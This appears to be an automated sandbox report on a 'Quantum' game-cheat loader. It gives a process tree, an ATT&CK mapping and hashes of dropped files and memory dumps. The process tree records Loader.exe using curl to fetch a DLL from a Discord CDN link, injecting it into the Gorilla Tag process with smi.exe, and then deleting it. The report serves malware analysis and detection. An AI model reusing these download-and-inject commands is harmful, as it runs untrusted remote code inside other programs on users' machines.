"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Quantum\" -ad -an -ai#7zMap3430:76:7zEvent16043
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4912

C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe
"C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c curl -s https://cdn.discordapp.com/attachments/1131984990788390924/1145857484809064498/TestMenu.dll --output C:\Users\Admin\AppData\Local\Temp\DSULOU.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\SysWOW64\curl.exe
    curl -s https://cdn.discordapp.com/attachments/1131984990788390924/1145857484809064498/TestMenu.dll --output C:\Users\Admin\AppData\Local\Temp\DSULOU.dll
    3⤵
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c smi.exe inject -p "Gorilla Tag" -a C:\Users\Admin\AppData\Local\Temp\DSULOU.dll -n TestMenu.Mods -c Loader -m Load
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Users\Admin\Downloads\Quantum\Debug\smi.exe
    smi.exe inject -p "Gorilla Tag" -a C:\Users\Admin\AppData\Local\Temp\DSULOU.dll -n TestMenu.Mods -c Loader -m Load
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1140 -s 840
      4⤵
      Program crash
      PID:4000
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\DSULOU.dll
  2⤵
  PID:2792

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Quantum\Debug\New Text Document.txt
1⤵
PID:4748

C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe
"C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3716

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 1140 -ip 1140
1⤵
PID:4424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014

Filesize
180KB

MD5
497835d373e12af4cd257487dd5d3612

SHA1
425950e9427926ac0aa7940c4a18a44ab59df47a

SHA256
e11ff08dff0a884b311133e2469146b2a54319cf60094511e098df0c3677c4e0

SHA512
aa05611f56185e02289345f9c286ca98f96d5e1d24c8d152605e866e60013dc2945fc60f826e81459003ca9c2b7d439c0f6fdd173cbee57cd751ee51b18d2bf7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
0831f856b1b30a6011188b0201d83582

SHA1
34a88660673eb91930a695cf50d51e6d42fcd456

SHA256
8a2b660a6b5ac292aef88b55524c689647e9f7393fd3d707ce57ee995973d48b

SHA512
2db9112c9e4414925a4ebbdc40a2c47d8d665cb833e11faddb3324a05d453dafe6c1dbb64f946bbb93b441993268d636c8e10473ef407a5682d171da27ff1dae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
e103aceaac824717b6382460669c3032

SHA1
fd03a48a8949a59f3bb368c831d7d65c1ec370db

SHA256
707f7728de897eb2a0176ebe3b233b2123124d5d0747fb8764296813cb139f69

SHA512
8c8b5fe57965fd327835425b7941493295672909580c264d09126504104c7a4507f569a7d45757a3fb8b23fd9a8d57cafec5eb2e575107e96fbfce6bdd481313

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
b27c0a3ab762c1cd8304d1b2485b0352

SHA1
11fb32bd5dee50e86b9a29c3c2839f0dce13f5cb

SHA256
d9038cd9a3596ae02f75a40894140503c21c8b0d417060cfc3514eb89a053d80

SHA512
3f073a29368423960607a3d6ed2f3c4bd8d4a8723dd36f91d072b901f1839463dc9458d29272e863ca54d56253601760fbfc56572b2944104fa1654fe2103fe6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
299e4b3ef5eb6f408b9f08e22b7e55d8

SHA1
d016718c3c3b85451aff3f3aaa7d20401d2b7cb7

SHA256
4619ea3e8facd0a6ba7706e778df47990f2ce8e4a066c60aa7cd98ff033628d3

SHA512
66beab496b6c4fce47bd66ee7b393dfb151acc0bb554bcad448d5d09bd17fe56efa3b0b4fa6232a9b1738cb27a2f63d528ed8bc4a6a4f8b9f1772d0e0ca8c9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\CFA0B0B143E4C50194769B9A2552FFEF\64\extremedumper.loaderhook.dll

Filesize
211KB

MD5
2e40ed16499ba8ff681b9bfe8263cef8

SHA1
f89f7d11dc028bb3fa1437b0d0de1affec35f8a1

SHA256
3577492fff8cd1dfdfae86f74e3d77a1aa672b49d18838355ce2a5bf86363f47

SHA512
2f47d4a9f7ec6a7f7eaf605e571c85ba16b4421df9a15c801502af6488287f9ed6c5e7f3c2b29ae2b4f6169252d9ac9a7b91bc666557fa1501347b7de36493a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\DSULOU.dll

Filesize
68KB

MD5
9db6fbea3a07d135277d873d87159b24

SHA1
49ce632a03e181b506ae1fb71889b57b71dc02a7

SHA256
584b29b8c789d0d277a4b914594f93182a5e2777fcaf7c505c02b533dabbbb66

SHA512
0079eb6455df3e069b80727a1df7bc56fd101a491e7b4f895695269de3d15401c254f150886672a1d0a985487c5fd8a41a35fb1ab0a00457e5ad33566731e50f

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe

Filesize
213KB

MD5
e528b272ad697406a5e9b7cb974b83dc

SHA1
f7394c3e500c9b9e3c2b26bd298c6c4a23e81790

SHA256
9faa634b5818ea8b6f90a7788854f5b0d850cdf57435b4c64938675204c61394

SHA512
054fba8477ae730b04937502af6875c7d20b08e41e97b536cf1ce269ddc2ac5efaaf1d1a054a3910d1b4922377dbf54b466949fda00d7f02446de88d34cf9537

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe

Filesize
213KB

MD5
e528b272ad697406a5e9b7cb974b83dc

SHA1
f7394c3e500c9b9e3c2b26bd298c6c4a23e81790

SHA256
9faa634b5818ea8b6f90a7788854f5b0d850cdf57435b4c64938675204c61394

SHA512
054fba8477ae730b04937502af6875c7d20b08e41e97b536cf1ce269ddc2ac5efaaf1d1a054a3910d1b4922377dbf54b466949fda00d7f02446de88d34cf9537

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\Loader.exe.config

Filesize
184B

MD5
cc46a0995713ba7cb577b4bbbedf83e8

SHA1
6cc50a0e444e33f65d42423195ed045a3a55daf8

SHA256
5fe1ad802f68d7c47dbbd8e60162ba88abaed162da5d381c85d3e4935311962e

SHA512
36f5b3acbc520504cfe56e5fe19de2a22ae3d2ddddb4c0eb3e441f884033077fb411e69976c3e250c3ef01189d0e48016bde67a73a0dbc950dd5d8ec7783fd2a

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\New Text Document.txt

Filesize
41B

MD5
bac7d2534f8a90ee890363c5929cbd85

SHA1
de82f797ab163303fb1c90216763d740ce65c202

SHA256
1bc43d792689d052c510ef55ff63ec7f56bd5281cae944652442e29f3ea97412

SHA512
d587c5a4f5c36f2624939b5cf4a58625aa782cfda5726d0997e03e6394a401474fab043ba389e071b1471586274915a42af2e750fb06e742ab3d465ff23ce670

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\SharpMonoInjector.dll

Filesize
22KB

MD5
d0caeafbe77a7b08017d5bd02060d0f3

SHA1
2e24c4a0ae534837f5925d1b9ba82e1d99c7710f

SHA256
23bc482d9451a546ffb84a0fb249df51f90e8ec8bf263efbcddd84557cf9fe62

SHA512
5874912d9ebacfc3873e7069cb247083cbcf62d07be3292eb00d8702e851acee44d4621af31533b7d616e3fc3217891b7aaa00911fafd1fac32bde45e5eba566

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\smi.exe

Filesize
9KB

MD5
c0a17812234aae6cd4365c67ec39a842

SHA1
0c141a692d0f67cc1c62dac14f303d4b1447187e

SHA256
12237476dfd8719929253c316091079d37d7ee8c6f630020b2b0a9996b036764

SHA512
84452a8b7e70abf4d2131f7fc451589b5aede332360b3834537bff012394be4f9e289fc893064027869cbda9d53cfe7c7793228c3adc98552ed5e30a8e4e4cae

Download Submit
C:\Users\Admin\Downloads\Quantum\Debug\smi.exe

Filesize
9KB

MD5
c0a17812234aae6cd4365c67ec39a842

SHA1
0c141a692d0f67cc1c62dac14f303d4b1447187e

SHA256
12237476dfd8719929253c316091079d37d7ee8c6f630020b2b0a9996b036764

SHA512
84452a8b7e70abf4d2131f7fc451589b5aede332360b3834537bff012394be4f9e289fc893064027869cbda9d53cfe7c7793228c3adc98552ed5e30a8e4e4cae

Download Submit
C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe

Filesize
1.7MB

MD5
58db100b228ff17f83726d4c2738990e

SHA1
d69bfa9ddb32de1999760e8b3b3236bc8934d66c

SHA256
f407b67a008fc2186329d5feffe830f7eead7a11f3b169d0d90099495edfcf2e

SHA512
e845a62e00fcb8305ab0ceececec73a2d46a490c04370742290398f5e568ba4cf43bc1caa0529405e9ee07c021a05109873271278a8c45eec67ad409dd670f51

Download Submit
C:\Users\Admin\Downloads\Quantum\ExtremeDumper\Gorilla Tag.exe

Filesize
1.7MB

MD5
58db100b228ff17f83726d4c2738990e

SHA1
d69bfa9ddb32de1999760e8b3b3236bc8934d66c

SHA256
f407b67a008fc2186329d5feffe830f7eead7a11f3b169d0d90099495edfcf2e

SHA512
e845a62e00fcb8305ab0ceececec73a2d46a490c04370742290398f5e568ba4cf43bc1caa0529405e9ee07c021a05109873271278a8c45eec67ad409dd670f51

Download Submit
memory/1140-144-0x00007FFC759E0000-0x00007FFC764A1000-memory.dmp

Filesize
10.8MB

Download
memory/1140-143-0x0000023A60800000-0x0000023A6081A000-memory.dmp

Filesize
104KB

Download
memory/1140-142-0x00007FFC759E0000-0x00007FFC764A1000-memory.dmp

Filesize
10.8MB

Download
memory/1140-141-0x0000023A607D0000-0x0000023A607DC000-memory.dmp

Filesize
48KB

Download
memory/1140-139-0x0000023A60410000-0x0000023A60418000-memory.dmp

Filesize
32KB

Download
memory/3708-108-0x0000000000870000-0x00000000008AC000-memory.dmp

Filesize
240KB

Download
memory/3708-115-0x0000000005230000-0x0000000005240000-memory.dmp

Filesize
64KB

Download
memory/3708-147-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3708-107-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3708-109-0x0000000005020000-0x0000000005032000-memory.dmp

Filesize
72KB

Download
memory/3708-110-0x0000000005230000-0x0000000005240000-memory.dmp

Filesize
64KB

Download
memory/3708-111-0x0000000005A00000-0x0000000005A3C000-memory.dmp

Filesize
240KB

Download
memory/3708-112-0x0000000006020000-0x00000000065C4000-memory.dmp

Filesize
5.6MB

Download
memory/3708-114-0x0000000075310000-0x0000000075AC0000-memory.dmp

Filesize
7.7MB

Download
memory/3716-129-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download
memory/3716-118-0x0000019D9BDC0000-0x0000019D9BF6E000-memory.dmp

Filesize
1.7MB

Download
memory/3716-119-0x00007FFC759E0000-0x00007FFC764A1000-memory.dmp

Filesize
10.8MB

Download
memory/3716-131-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download
memory/3716-130-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download
memory/3716-125-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download
memory/3716-128-0x00007FFC759E0000-0x00007FFC764A1000-memory.dmp

Filesize
10.8MB

Download
memory/3716-127-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download
memory/3716-126-0x0000019D9DCB0000-0x0000019D9DCC0000-memory.dmp

Filesize
64KB

Download